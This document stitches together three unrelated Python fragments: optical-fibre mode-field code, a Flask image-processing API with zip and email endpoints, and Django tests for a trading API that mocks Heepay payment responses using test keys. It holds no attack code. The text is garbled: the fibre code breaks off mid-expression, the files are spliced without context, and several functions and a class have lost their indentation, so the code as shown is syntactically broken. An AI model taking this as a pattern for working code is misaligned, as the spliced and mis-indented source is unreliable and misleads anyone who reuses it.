        highest order possible.
        """
        betas = self.beta_func(o_vec, i)
        deg = 30
        fitted = False
        # warnings.warn(Warning())
        with warnings.catch_warnings():
            # Warnings (e.g. poorly-conditioned fits) are promoted to errors;
            # the degree is lowered until polyfit succeeds cleanly.
            while not(fitted):
                warnings.filterwarnings('error')
                try:
                    coef = np.polyfit(self.o_norm, betas, deg=deg)
                    fitted = True
                except Warning:
                    deg -= 1
        return coef
class Modes(Fibre):
"""docstring for Modes"""
def __init__(self, o_vec, o_c, beta_c, u_vec, w_vec, a_vec, N_points, per, err, nm=2):
    """Interpolate the modal eigenvalues onto the carrier frequency and set
    up the mode-field machinery.

    NOTE(review): ``o_vec *= 1e12`` scales the caller's numpy array in
    place — confirm callers do not reuse it afterwards.
    """
    super().__init__()
    self.n = 1  # azimuthal mode order (HE11)
    self.N_points = N_points
    o_vec *= 1e12
    o_c *= 1e12
    o_norm = o_vec - o_c
    #self.coordinates(x, y)
    self.beta_c = beta_c
    # indexes(self, l, r, per, err)
    self.core = self.indexes(2*pi*c/o_c, a_vec, per, err)[0]
    self.neff = self.beta_c / (o_c / c)
    # Cubic-interpolate each core's u(omega), w(omega) to the carrier
    # (detuning o_norm == 0).
    self.u_vec, self.w_vec = np.zeros(u_vec.shape[0]),\
        np.zeros(u_vec.shape[0])
    for i in range(u_vec.shape[0]):
        self.u_vec[i] = interp1d(o_norm, u_vec[i, :], kind='cubic')(0)
        self.w_vec[i] = interp1d(o_norm, w_vec[i, :], kind='cubic')(0)
    self.a_vec = a_vec
    return None
def set_coordinates(self, a):
    """Build a Cartesian grid spanning [-2a, 2a] in x and y around a core of
    radius ``a``, plus its polar representation (R, T)."""
    self.x, self.y = np.linspace(-2*a, 2*a, self.N_points),\
        np.linspace(-2*a, 2*a, self.N_points)
    self.X, self.Y = np.meshgrid(self.x, self.y)
    self.R = ((self.X)**2 + (self.Y)**2)**0.5
    # NOTE(review): arctan(Y/X) only yields angles in (-pi/2, pi/2) and
    # divides by zero at X == 0; np.arctan2(Y, X) would give the full-plane
    # angle — confirm whether the half-plane angle is intended here.
    self.T = np.arctan(self.Y/self.X)
    return None
def pick_eigens(self, i):
    """Select core ``i``'s eigenvalues/geometry and precompute the
    polarization parameter ``s`` used by the field expressions E_r/E_theta."""
    self.u = self.u_vec[i]
    self.w = self.w_vec[i]
    self.beta = self.beta_c[i]
    self.a = self.a_vec[i]
    # s = n (1/u^2 + 1/w^2) / (J'/(u J) + K'/(w K)), from the HE-mode relations.
    self.s = self.n * (1/self.u**2 + 1/self.w**2) /\
        (jv_(self.n, self.u)/(self.u*jv(self.n, self.u))
         + kv_(self.n, self.w)/(self.w*kv(self.n, self.w)))
    return None
def E_r(self, r, theta):
    """Radial electric-field component at polar points (r, theta).

    Uses the J-Bessel solution inside the core (r <= a) and the K-Bessel
    decay in the cladding (r > a). Returns the field for the two orthogonal
    polarizations (cos(n*theta) and cos(n*theta + pi/2) azimuthal factors).
    Requires ``pick_eigens`` to have set u, w, beta, a and s.
    """
    # Partition the sample points into core and cladding regions.
    r0_ind = np.where(r <= self.a)
    r1_ind = np.where(r > self.a)
    temp = np.zeros(r.shape, dtype=np.complex128)
    r0, r1 = r[r0_ind], r[r1_ind]
    temp[r0_ind] = -1j * self.beta*self.a / \
        self.u*(0.5*(1 - self.s) * jv(self.n - 1, self.u * r0 / self.a)
                - 0.5*(1 + self.s)*jv(self.n + 1, self.u * r0 / self.a))
    # Cladding amplitude is scaled so the field is continuous at r == a.
    temp[r1_ind] = -1j * self.beta*self.a*jv(self.n, self.u)/(self.w*kv(self.n, self.w)) \
        * (0.5*(1 - self.s) * kv(self.n - 1, self.w * r1 / self.a)
           + 0.5*(1 + self.s)*kv(self.n+1, self.w * r1 / self.a))
    return temp*np.cos(self.n*theta), temp*np.cos(self.n*theta+pi/2)
def E_theta(self, r, theta):
r0_ind = np.where(r <= self.a)
r1_ind = np.where(r > self.a)
temp = np.zeros(r.shape, dtype=np.complex128)
r0, r1 = r[r0_ind], r[r1_ind]
temp[r0_ind] = 1j * self.beta*self.a / \
self.u*(0.5*(1 - self.s) * jv(self.n - 1, self.u * r0 / self.a)
+ 0.5*(1 + self.s)*jv(self.n+1, self.u * r0 / self.a))
temp[r1_ind] = 1j * self.beta*self.a * \
jv(self.n, self.u)/(self.w*kv(self.n, self.w)) \
* (0.5*(1 - self.s) * kv(self.n | |
db.update_user_current(
content["email"], content["image_id"])
image = db.find_image(
content["image_id"], content["email"])
if not image:
return error_handler(
400, "Image does not exist", "ValueError")
image = db.image_to_json(image)
return jsonify(image)
@app.route("/api/process/confirm", methods=["POST"])
def post_confirm_image():
    """
    Confirms image change and adds the image to the user.
    Returns:
        dict: Image that as associated with user.
    """
    content = request.get_json()
    # Reject the request unless every required image attribute is present.
    if not _verify_confirm_image(content):
        return error_handler(400, "Insufficient Inputs", "AttributeError")
    # must contain image_data, email
    added_image = db.add_image(content["email"], content)
    added_image = db.image_to_json(added_image)
    return jsonify(added_image)
def _verify_confirm_image(image):
"""
Confirms that all necessary attributes are present at image add.
Args:
image (dict): Image object to be added.
Returns:
bool: Whether or not the image object is valid.
"""
req = ['child_ids', 'processing_history', 'parent_id',
'description', 'processing_time', 'format', 'process',
'email', 'width', 'image_id', 'height', 'image_data']
if set(req).issubset(set(image.keys())):
return True
return False
@app.route("/api/image/get_images", methods=["POST"])
def post_get_images():
    """
    Obtains images from database based on ID.
    POSTed request should contain:
        image_ids: as a list of images to get.
        email: user associated with this images.
    Returns:
        list: all images
    """
    content = request.get_json()
    email = content["email"]
    # Accept a single id as well as a list of ids. isinstance replaces the
    # previous ``type(x) != list`` comparison (idiomatic, and tolerant of
    # list subclasses).
    if not isinstance(content["image_ids"], list):
        content["image_ids"] = [content["image_ids"]]
    ret_images = []
    for image_id in content["image_ids"]:
        image = db.find_image(image_id, email)
        ret_images.append(db.image_to_json(image))
    return jsonify(ret_images)
@app.route("/api/image/get_images_zipped", methods=["POST"])
def post_get_images_zipped():
    """
    Obtains zipped folder of images from database based on IDs.
    POSTed request should contain:
        image_ids: as a list of images to get.
        email: user associated with this images.
        format: format for the images to be converted to.
    Returns:
        dict: base 64 encoded zip file of all images.
    """
    content = request.get_json()
    email = content["email"]
    if not isinstance(content["image_ids"], list):
        content["image_ids"] = [content["image_ids"]]
    format = _determine_format(content["format"]).lower()
    # resets images.zip and temp folder
    _remove_zip_docs()
    # create a temp folder
    folder_name = "temp"
    if not os.path.exists(folder_name):
        os.makedirs(folder_name)
    # Write each image into the temp folder. Track filename stems already
    # used so that two images sharing an original filename do not overwrite
    # each other. (The previous implementation compared stems against a list
    # of full filenames, so collisions were never detected.)
    seen_stems = set()
    for image_id in content["image_ids"]:
        image = db.find_image(image_id, email)
        np_image = b64str_to_numpy(image.image_data)
        stem = os.path.splitext(image.filename)[0]
        if stem in seen_stems:
            # Disambiguate duplicates with the image id.
            filename = "{}_{}.{}".format(stem, image_id, format)
        else:
            filename = "{}.{}".format(stem, format)
        seen_stems.add(stem)
        filepath = os.path.join(folder_name, filename)
        imageio.imwrite(filepath, np_image)
    # zip the directory
    zip_filename = 'images.zip'
    zipf = zipfile.ZipFile(
        zip_filename, 'w', zipfile.ZIP_DEFLATED)
    zip_folder(folder_name, zipf)
    zipf.close()
    # return object
    ret = {
        "filename": zip_filename,
        "zip_data": zip_to_b64(zip_filename)
    }
    return jsonify(ret)
def _remove_zip_docs():
"""
Removes all the files associated with
downloading and sending a zip.
"""
if os.path.isdir("temp"):
shutil.rmtree('temp')
if os.path.exists("images.zip"):
os.remove('images.zip')
def zip_folder(folder_name, ziph):
    """
    Zips folder given a path
    Args:
        folder_name (str): folder to zip
        ziph: some zip path indicator.
    """
    # Add each entry at the archive root (flat arcnames, no folder prefix).
    for entry in os.listdir(folder_name):
        source_path = os.path.join(folder_name, entry)
        ziph.write(source_path, arcname=entry)
def zip_to_b64(filepath):
    """
    Takes a zip file and turns it to base 64.
    Args:
        filepath: Filepath of the folder to zip
    Returns:
        str: base 64 representation of zip folder.
    """
    # Read the archive bytes and encode them as a base-64 string.
    with open(filepath, "rb") as archive:
        raw = archive.read()
    return base64.b64encode(raw).decode('utf-8')
def _link_new_image(current_image):
    """
    Makes associated links.
    Args:
        current_image: current image of the user/post data.
    Returns:
        dict: Dict with linked ids.
    Raises:
        ValueError: if current_image is falsy.
    """
    if not current_image:
        raise ValueError("current_image is None.")
    # Start from the JSON form of the current image, then re-link it as a
    # child record: the current image becomes the parent and a fresh id is
    # assigned to the new image.
    new_image = db.image_to_json(current_image)
    new_image["email"] = current_image.email
    new_image["parent_id"] = current_image.image_id
    new_image["format"] = current_image.format
    new_image["image_id"] = random_id()
    return new_image
def _populate_image_meta(new_image, image_data):
"""
Populates an existing dict with image meta information.
Args:
new_image (dict):
image_data (np.ndarray): image data in RGB
Returns:
dict: dict with image meta information
"""
new_image["width"] = image_data.shape[0]
new_image["height"] = image_data.shape[1]
return new_image
def _determine_format(format_string: str):
"""
Determines file format from a string. Could be header/ext.
Args:
format_string: Header or file extension.
Returns:
str: Type of the image.
"""
formats = ["PNG",
"TIF", "TIFF",
"JPG", "JPEG"]
for format in formats:
if format in format_string.upper():
if "JPEG" in format_string.upper():
return "JPG"
if "TIF" in format_string.upper():
return "TIFF"
return format
return "JPG" # assume jpg
@app.route("/api/process/hist_eq", methods=["POST"])
def post_hist_eq():
    """
    Takes CURRENT image and performs histogram eq on image.
    POSTed request should contain:
        email: ID of the current user.
    Returns:
        object: New hist eq'd image.
    """
    # should take the current image with all info
    content = request.get_json()
    # grab the user's current image.
    user_image_id = db.get_current_image_id(content["email"])
    current_image = db.find_image(user_image_id, content["email"])
    # Derive a child image record, process the pixels, then re-encode and
    # attach histogram + provenance metadata.
    new_image = _link_new_image(current_image)
    image_data, new_image["processing_time"] = \
        Processing(b64str_to_numpy(current_image.image_data)).hist_eq()
    new_image = _populate_image_meta(new_image, image_data)
    new_image["image_data"] = numpy_to_b64str(image_data,
                                              format=new_image["format"])
    new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
    new_image["histogram"] = _get_b64_histogram(image_data)
    new_image["process"] = "hist_eq"
    # Record the operation in the user's processing history.
    db.update_user_process(content["email"], new_image["process"])
    return jsonify(new_image)
@app.route("/api/process/contrast_stretch", methods=["POST"])
def post_image_contrast_stretch():
    """
    Takes CURRENT image and performs contrast stretch on image.
    POSTed request should contain:
        email: ID of the current user.
    Optional query args:
        l: low percentile (default 10); h: high percentile (default 90).
    Returns:
        object: New contrast stretched image.
    """
    content = request.get_json()
    p_low = request.args.get("l", 10)
    p_high = request.args.get("h", 90)
    # NOTE(review): query args arrive as strings, so when "l"/"h" are
    # supplied the percentile tuple holds str values rather than ints —
    # confirm Processing.contrast_stretch tolerates that.
    percentile = (p_low, p_high)
    user_image_id = db.get_current_image_id(content["email"])
    current_image = db.find_image(user_image_id, content["email"])
    new_image = _link_new_image(current_image)
    image_data, new_image["processing_time"] = \
        Processing(b64str_to_numpy(current_image.image_data)
                   ).contrast_stretch(percentile)
    new_image = _populate_image_meta(new_image, image_data)
    new_image["image_data"] = numpy_to_b64str(image_data,
                                              format=new_image["format"])
    new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
    new_image["histogram"] = _get_b64_histogram(image_data)
    new_image["process"] = "contrast_stretch"
    db.update_user_process(content["email"], new_image["process"])
    return jsonify(new_image)
@app.route("/api/process/log_compression", methods=["POST"])
def post_image_log_compression():
    """
    Takes CURRENT image and performs log compression on image.
    POSTed request should contain:
        email: ID of the current user.
    Returns:
        object: New log compressed image.
    """
    content = request.get_json()
    user_image_id = db.get_current_image_id(content["email"])
    current_image = db.find_image(user_image_id, content["email"])
    # Same pipeline as the other processing endpoints: link a child record,
    # process, re-encode, attach histogram and provenance.
    new_image = _link_new_image(current_image)
    image_data, new_image["processing_time"] = \
        Processing(b64str_to_numpy(current_image.image_data)).log_compression()
    new_image = _populate_image_meta(new_image, image_data)
    new_image["image_data"] = numpy_to_b64str(image_data,
                                              format=new_image["format"])
    new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
    new_image["histogram"] = _get_b64_histogram(image_data)
    new_image["process"] = "log_compression"
    db.update_user_process(content["email"], new_image["process"])
    return jsonify(new_image)
@app.route("/api/process/reverse_video", methods=["POST"])
def post_image_rev_video():
    """
    Inverse the intensities of a grayscale image.
    Only works for grayscale images
    POSTed request should contain:
        email: ID of the current user.
    Returns:
        dict: image with inverted intensities.
    """
    content = request.get_json()
    user_image_id = db.get_current_image_id(content["email"])
    current_image = db.find_image(user_image_id, content["email"])
    new_image = _link_new_image(current_image)
    # Processing.reverse_video raises ValueError for non-grayscale input;
    # translate that into a 400 client error.
    try:
        image_data, new_image["processing_time"] = \
            Processing(b64str_to_numpy(
                current_image.image_data)).reverse_video()
    except ValueError:
        return error_handler(400, "must be grayscale", "ValueError")
    new_image = _populate_image_meta(new_image, image_data)
    # maybe something else
    new_image["image_data"] = numpy_to_b64str(image_data,
                                              format=new_image["format"])
    new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
    # Histogram of the single intensity channel.
    new_image["histogram"] = _get_b64_histogram(
        image_data, is_gray=True)
    new_image["process"] = "reverse_video"
    db.update_user_process(content["email"], new_image["process"])
    return jsonify(new_image)
@app.route("/api/process/sharpen", methods=["POST"])
def post_image_sharpen():
    """
    Takes CURRENT image and performs image sharpen on whole image.
    POSTed request should contain:
        email: ID of the current user.
    Returns:
        object: sharpened image.
    """
    content = request.get_json()
    user_image_id = db.get_current_image_id(content["email"])
    current_image = db.find_image(user_image_id, content["email"])
    # Same pipeline as the other processing endpoints.
    new_image = _link_new_image(current_image)
    image_data, new_image["processing_time"] = \
        Processing(b64str_to_numpy(current_image.image_data)).sharpen()
    new_image = _populate_image_meta(new_image, image_data)
    new_image["image_data"] = numpy_to_b64str(image_data,
                                              format=new_image["format"])
    new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
    new_image["histogram"] = _get_b64_histogram(image_data)
    new_image["process"] = "sharpen"
    db.update_user_process(content["email"], new_image["process"])
    return jsonify(new_image)
@app.route("/api/process/blur", methods=["POST"])
def post_image_blur():
    """
    Takes CURRENT image and performs image blur on whole image.
    POSTed request should contain:
        email: ID of the current user.
    Returns:
        object: blurred image.
    """
    content = request.get_json()
    user_image_id = db.get_current_image_id(content["email"])
    current_image = db.find_image(user_image_id, content["email"])
    # Same pipeline as the other processing endpoints.
    new_image = _link_new_image(current_image)
    image_data, new_image["processing_time"] = \
        Processing(b64str_to_numpy(current_image.image_data)).blur()
    new_image = _populate_image_meta(new_image, image_data)
    new_image["image_data"] = numpy_to_b64str(image_data,
                                              format=new_image["format"])
    new_image["image_data"], _ = _get_b64_format(new_image["image_data"])
    new_image["histogram"] = _get_b64_histogram(image_data)
    new_image["process"] = "blur"
    db.update_user_process(content["email"], new_image["process"])
    return jsonify(new_image)
def _get_b64_histogram(image_data, is_gray=False):
    """
    Gets a base 64 representation of a histogram for an image
    Args:
        image_data (np.ndarray): Image.
        is_gray (bool): histogram a single intensity channel when True.
    Returns:
        str: Base 64 representation of the histogram for image.
    """
    histogram = Processing(
        image_data, is_color=False).histogram(
        image_data, is_gray=is_gray)
    # Drop the alpha channel before encoding.
    histogram = histogram[:, :, :3]
    return numpy_to_b64str(histogram)
@app.route("/api/process/email_image", methods=["POST"])
def post_email_image():
    """
    Returns the information about if the image was emailed.
    POSTed request should contain:
        email: email of the current user.
        image_id: id of the image to email
    Returns:
        object: response from Sendgrid, or a 400 error response when the
        request is malformed or the image cannot be found.
    """
    content = request.get_json()
    if "email" not in content.keys():
        return error_handler(400,
                             "must contain email", "AttributeError")
    if "image_id" not in content.keys():
        return error_handler(400,
                             "must contain image_id", "AttributeError")
    email = content["email"]
    image_id = content["image_id"]
    image = db.find_image(image_id, email)
    if image is not None:
        return email_image(image)
    # Previously this fell through to ``return None``, which makes Flask
    # raise a 500; report a client error instead, matching the phrasing used
    # by the other endpoints.
    return error_handler(400, "Image does not exist", "ValueError")
def b64str_to_numpy(b64_img):
    """
    Converts a b64str to numpy. Strips headers.
    Args:
        b64_img (str): base 64 representation of an image.
    Returns:
        np.ndarray: numpy array of image.
    """
    # Strip any "data:...;base64," style header before decoding.
    b64_img, _ = _get_b64_format(b64_img)
    byte_image = base64.b64decode(b64_img)
    image_buf = io.BytesIO(byte_image)
    np_img = imageio.imread(image_buf)
    return np_img
def _get_b64_format(b64_img):
"""
Determines the format of the b64 string
Args:
b64_img (str): base 64 representation of an image.
Returns:
b64_image: Array data of the image only
image_format: The format of the image
"""
split = b64_img.split("base64,") # get rid of header
if len(split) == 2:
b64_img = split[1]
image_format = _determine_format(split[0])
else:
b64_img = split[0]
image_format = "JPG" # assume | |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys, io, traceback, time, json, copy, math
import logging
from calendar import timegm
import datetime as dt
from datetime import timedelta
sys.path.append('../stakingsvc/')
from django.contrib.auth.models import User
from django.test import TestCase, TransactionTestCase
from django.test import Client
from unittest.mock import Mock, MagicMock, patch
from tradeex.data.tradeapirequest import TradeAPIRequest
from tradeex.data.api_const import *
from tradeex.controllers.apiusertransmanager import APIUserTransactionManager
from tradeex.apitests.tradingutils import *
from tradeex.apitests.util_tests import *
from tradeex.responses.heepaynotify import HeepayNotification
from tradeex.controllers.crypto_utils import *
from tradeex.models import *
from trading.models import *
from trading.controller import useraccountinfomanager, ordermanager
import json
# match the hy_bill_no in test data test_heepay_confirm.json
TEST_HY_BILL_NO='180102122300364021000081666'
# Heepay sandbox app credentials used by the mocked gateway.
TEST_HY_APPID = 'hyq17121610000800000911220E16AB0'
TEST_HY_KEY='4AE4583FD4D240559F80ED39'
# Payment accounts for the two sides of the mocked trade.
TEST_BUYER_ACCOUNT='13910978598'
TEST_SELLER_ACCOUNT='api_user2_12345'
# API key/secret pairs for the two test API users.
TEST_API_USER1_APPKEY = 'TRADEEX_USER1_APP_KEY_1234567890ABCDE'
TEST_API_USER2_APPKEY = 'TRADEEX_USER2_APP_KEY_SELLER'
TEST_API_USER1_SECRET='TRADEEX_USER1_APP_SECRET'
TEST_API_USER2_SECRET='TRADEEX_USER2_API_SECRET'
TEST_OUT_TRADE_NO_REDEEM = 'order_to_redeem'
# Amounts are in the API's integer money unit (presumably cents — confirm).
TEST_PURCHASE_AMOUNT = 6200
TEST_REDEEM_AMOUNT = 5000
TEST_CNY_ADDR="TRADDEX_USER1_EXTERNAL_TEST_ADDR"
TEST_CRYPTO_SEND_COMMENT = ""
TEST_NOTIFY_URL = "http://testurl/"
# Template of a successful Heepay response, rendered per-test.
# NOTE(review): name is misspelled ("reponse"); referenced as-is elsewhere,
# so it is left unchanged here.
heepay_reponse_template = json.load(io.open('trading/tests/data/heepay_return_success.json', 'r', encoding='utf-8'))
logger = logging.getLogger('tradeex.apitests.test_trading')
#mock function
def send_buy_apply_request_side_effect(payload):
    """Mock of HeePayManager.send_buy_apply_request for purchase tests.

    Parses the signed request payload, looks up the purchase order and the
    seller's heepay account, and renders a signed success response from the
    heepay response template.

    :param payload: JSON string of the API request; its 'biz_content' field
        is itself a JSON-encoded string.
    :returns: (status_code, status_text, response_body) tuple mimicking the
        real gateway call; (500, 'error', '{}') when the seller account
        cannot be resolved.
    """
    json_payload = json.loads(payload)
    biz_content = json.loads(json_payload['biz_content'])
    key_values = {}
    key_values['app_id'] = json_payload['app_id']
    key_values['out_trade_no'] = biz_content['out_trade_no']
    key_values['subject'] = biz_content['subject']
    key_values['total_fee'] = biz_content['total_fee']
    key_values['hy_bill_no'] = TEST_HY_BILL_NO
    buy_order = Order.objects.get(pk=biz_content['out_trade_no'])
    buyer_account = TEST_BUYER_ACCOUNT
    #TODO: ??? Does Heepay purchase request need from account?
    """
    try:
        buyer_account = UserPaymentMethod.objects.get(
            user__id=buy_order.user.id,
            provider__code = 'heepay').account_at_provider
    except UserPaymentMethod.DoesNotExist:
        logger.error('send_buy_apply_request_side_effect(): cannot find the payment account of the buyer that test trans {0} try to sell'.format(biz_content['out_trade_no']))
        return 500, 'error', '{}'
    except UserPaymentMethod.MultipleObjectsReturned:
        logger.error('System find more than one payment account of the buyer that test trans {0} try to sell'.format(biz_content['out_trade_no']))
        return 500, 'error', '{}'
    """
    #TODO: if trans state the buyer account
    try:
        seller_account = UserPaymentMethod.objects.get(
            user__id=buy_order.reference_order.user.id,
            provider__code = 'heepay').account_at_provider
    except UserPaymentMethod.DoesNotExist:
        # bugfix: log message used to say 'side_effec():' (typo).
        logger.error('send_buy_apply_request_side_effect(): cannot find the payment account of the seller that test trans {0} try to buy from'.format(biz_content['out_trade_no']))
        return 500, 'error', '{}'
    except UserPaymentMethod.MultipleObjectsReturned:
        logger.error('System find more than one payment account of the seller that test trans {0} try to buy from'.format(biz_content['out_trade_no']))
        return 500, 'error', '{}'
    key_values['from_account'] = buyer_account
    key_values['to_account'] = seller_account
    # Render the response, then sign it: the signature is computed over the
    # rendered JSON before the 'sign' field is attached.
    output_data = jinja2_render('tradeex/apitests/data/heepay_response_template.j2', key_values)
    output_json = json.loads(output_data)
    sign = sign_test_json(output_json, TEST_HY_KEY)
    output_json['sign'] = sign
    return 200, 'Ok', json.dumps(output_json, ensure_ascii=False)
#mock function
def send_buy_apply_for_redeem_side_effect(payload):
    """Mock of the heepay buy-apply call used by redeem tests.

    Unlike the purchase variant, the seller account is fixed to
    TEST_SELLER_ACCOUNT and no from_account is rendered.

    :param payload: JSON string whose 'biz_content' field is itself JSON.
    :returns: (200, 'Ok', signed response JSON string).
    """
    request_json = json.loads(payload)
    biz_content = json.loads(request_json['biz_content'])
    template_values = {
        'app_id': request_json['app_id'],
        'out_trade_no': biz_content['out_trade_no'],
        'subject': biz_content['subject'],
        'total_fee': biz_content['total_fee'],
        'hy_bill_no': TEST_HY_BILL_NO,
        # from_account intentionally omitted for the redeem flow.
        'to_account': TEST_SELLER_ACCOUNT,
    }
    rendered = jinja2_render('tradeex/apitests/data/heepay_response_template.j2', template_values)
    response_json = json.loads(rendered)
    # Sign over the unsigned payload, then attach the signature.
    response_json['sign'] = sign_test_json(response_json, TEST_HY_KEY)
    return 200, 'Ok', json.dumps(response_json, ensure_ascii=False)
#mock function
def unlock_wallet_for_purchase_test(timeout_in_sec):
    """Mock of CryptoUtility.unlock_wallet: intentionally a no-op."""
#mock function
def send_fund_for_purchase_test(target_addr, amount, comment):
    """Mock of CryptoUtility.send_fund used in purchase tests.

    Asserts that the system sends the expected amount to the expected
    external CNY address with the expected comment, then returns a fake txid.
    """
    logger.info('send_fund_for_purchase_test():come to the mock of send fund()')
    print('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& send_fund_for_purchase_test &&&&&&&&&&&&&&&&&&&&&&&&')
    checker = TestCase()
    checker.assertEqual(TEST_CNY_ADDR, target_addr, "System should send purchase CNY to {0}".format(TEST_CNY_ADDR))
    # Amounts in the test constants are expressed in cents.
    amount_in_cent = int(amount * 100)
    checker.assertEqual(TEST_PURCHASE_AMOUNT, amount_in_cent, "System should come to send {0} unit of CNY".format(amount_in_cent))
    checker.assertEqual(TEST_CRYPTO_SEND_COMMENT, comment, "System expects comment like '{0}'".format(TEST_CRYPTO_SEND_COMMENT))
    return {'txid': 'TEST_TXID'}
#mock function
def send_json_request_for_purchase_test(payload, trackId='', response_format='json'):
    """Mock of APIClient.send_json_request for the purchase notification path."""
    logger.debug('come to mock to send notification back to buyer')
    verifier = TestCase()
    verifier.assertEqual('text', response_format, "System ask for text response")
    #TODO: more validation on payload
    return 'OK'
#mock function
def send_json_request_for_redeem_test(payload, trackId='', response_format='json'):
    """Mock of APIClient.send_json_request for the redeem notification path."""
    logger.debug('come to mock to send notification back to buyer')
    verifier = TestCase()
    verifier.assertEqual('text', response_format, "System ask for text response")
    #TODO: more validation on payload
    return 'OK'
# Create your tests here.
class TestTradingAPI(TransactionTestCase):
fixtures = ['fixture_test_tradeapi.json']
def setUp(self):
pass
def validate_success_prepurchase_response(self, resp_json):
self.assertEqual(resp_json['return_code'], 'SUCCESS')
return True
def validate_user_info(self, username):
useraccountInfo = useraccountinfomanager.get_user_accountInfo(User.objects.get(username=username),'AXFund')
self.assertTrue(useraccountInfo.balance > 0, "the balance of {0} should be larger than 0".format(username))
self.assertTrue(useraccountInfo.available_balance > 0, "the available balance of {0} should be larger than 0".format(username))
self.assertTrue(useraccountInfo.paymentmethods, "user {0} should have payment info".format(username))
self.assertEqual(1, len(useraccountInfo.paymentmethods), "There should be 1 payment method for user {0}".format(username))
self.assertEqual('heepay', useraccountInfo.paymentmethods[0].provider_code, "user {0}\'s payment method should come from heepay".format(username))
self.assertTrue(useraccountInfo.paymentmethods[0].account_at_provider, "User {0} should have account at heepay".format(username))
def validate_purchase_first_state(self,request_obj, resp_json):
api_trans = None
try:
api_trans = APIUserTransaction.objects.get(api_out_trade_no=TEST_OUT_TRADE_NO_REDEEM)
except APIUserTransaction.DoesNotExist:
self.fail('There should be one api user transaction record for {0} API call'.format(TEST_OUT_TRADE_NO_REDEEM))
except APIUserTransaction.MultipleObjectsReturned:
self.fail('There should not be more than one api user transaction record for {0} API call'.format(TEST_OUT_TRADE_NO_REDEEM))
self.assertEqual(api_trans.action, API_METHOD_REDEEM)
self.assertTrue(api_trans.reference_order)
self.assertEqual('SELL', api_trans.reference_order.order_type)
self.assertEqual('ALL_OR_NOTHING', api_trans.reference_order.sub_type)
self.assertEqual('API', api_trans.reference_order.order_source)
self.assertTrue(math.fabs(round(request_obj.total_fee/100.0, 8) - api_trans.reference_order.total_amount) < 0.00000001)
def create_no_fitting_order(self):
print('create_no_fitting_order()')
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 100, 0.5, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 100 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content,'Create order of 100 units hit issue')
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 200, 0.3, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 200 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content, 'Create order of 200 units hit issue')
show_order_overview()
def create_fitting_order(self, amount):
print('create_fitting_order({0})'.format(amount))
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 200, 0.5, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 200 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content,'Create order of 200*0.5 units hit issue')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 156, 0.4, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 150*0.4 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content, 'Create order of 150*0.4 units hit issue')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 156, 0.4, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 156*0.4 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content,'Create order of 156*0.5 units hit issue')
self.validate_user_info('<EMAIL>')
resp = create_axfund_sell_order('<EMAIL>', 'user@123', 150, 0.4, 'CNY')
self.assertEqual(200, resp.status_code, "Create order of 200*0.4 units should return 200")
self.assertFalse('系统遇到问题'.encode('utf-8') in resp.content, 'Create order of 200*0.4 units hit issue')
    def get_api_trans(self, target_out_trade_no):
        """Fetch the unique APIUserTransaction for *target_out_trade_no*.

        Fails the test (instead of raising) when zero or multiple records match.
        """
        try:
            return APIUserTransaction.objects.get(api_out_trade_no = target_out_trade_no)
        except APIUserTransaction.DoesNotExist:
            self.fail('System cannot find the api trans for out_trade_no {0}'.format(target_out_trade_no))
        except APIUserTransaction.MultipleObjectsReturned:
            self.fail('System find more than one api trans for out_trade_no {0}'.format(target_out_trade_no))
def validate_api_trans_before_confirm(self, api_trans, expected_app_id,
expected_secret_key, expected_out_trade_no, **kwargs):
self.assertEqual(expected_app_id, api_trans.api_user.apiKey, 'api_trans api_key is not expected')
self.assertEqual(expected_secret_key, api_trans.api_user.secretKey, 'api_trans secret_key is not expected')
self.assertEqual(expected_out_trade_no, api_trans.api_out_trade_no, 'api_trans out trade no is not expected')
if kwargs:
for key, value in kwargs.items():
if key == 'expected_subject':
self.assertEqual(value, api_trans.subject, 'api_trans subject is not expected')
elif key == 'expected_attach':
self.assertEqual(value, api_trans.attach, 'api_trans attach is not expected')
elif key == 'expected_total_fee':
self.assertEqual(value, api_trans.total_fee, 'api_trans total_fee is not expected')
elif key == 'expected_return_url':
self.assertEqual(value, api_trans.return_url, 'api_trans return_url is not expected')
elif key == 'expected_notify_url':
self.assertEqual(value, api_trans.notify_url, 'api_trans notify_url is not expected')
    def create_heepay_confirm(self, template_path, api_trans, trade_status, payment_time):
        """Build a signed heepay payment-confirmation JSON for *api_trans*.

        NOTE(review): *template_path* is unused - the template path is
        hard-coded below; confirm before removing the parameter.

        :param api_trans: APIUserTransaction whose action decides how the
            purchase order is resolved.
        :param trade_status: status string injected into the confirmation
        :param payment_time: payment timestamp injected into the confirmation
        :returns: dict of the rendered confirmation including a 'sign' field
        """
        key_values = {}
        key_values['app_id'] = TEST_HY_APPID
        # for purchase transaction, the transaction's reference order is the purchase order
        if api_trans.action == 'wallet.trade.buy':
            purchase_order = api_trans.reference_order
        # for redeem transaction, we need to get the purchase order of the sell order that
        # the transaction put forward
        elif api_trans.action == 'wallet.trade.sell':
            purchase_order = Order.objects.get(reference_order__order_id=api_trans.reference_order.order_id, order_type='BUY')
        # NOTE(review): purchase_order is unbound (NameError) for any other
        # action value - only buy/sell transactions are expected here.
        key_values['out_trade_no'] = purchase_order.order_id
        key_values['subject'] = api_trans.subject if api_trans.subject else ''
